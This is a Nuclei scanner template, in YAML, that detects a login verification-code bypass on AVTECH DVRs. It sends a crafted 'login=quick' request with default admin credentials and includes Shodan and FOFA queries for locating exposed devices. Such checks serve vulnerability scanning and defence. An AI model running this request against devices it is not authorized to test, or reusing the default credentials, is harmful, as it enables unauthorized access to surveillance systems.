id: avtech-verification-bypass

info:
  name: AVTECH DVR - Login Verification Code Bypass
  author: ritikchaddha
  severity: low
  description: |
    AVTECH DVR products are  vulnerable to verification code bypass just by entering the "login=quick" parameter to bypass verification code.
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"login" product:"Avtech"
    fofa-query: app="AVTECH-视频监控"
  tags: avtech,verify,bypass,iot

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/nobody/VerifyCode.cgi?account={{base64(username + ':' + password)}}&login=quick"

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - linux321

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "^0.*\nOK.*"

      - type: dsl
        dsl:
          - status_code == 200
          - len(body) == 5
        condition: and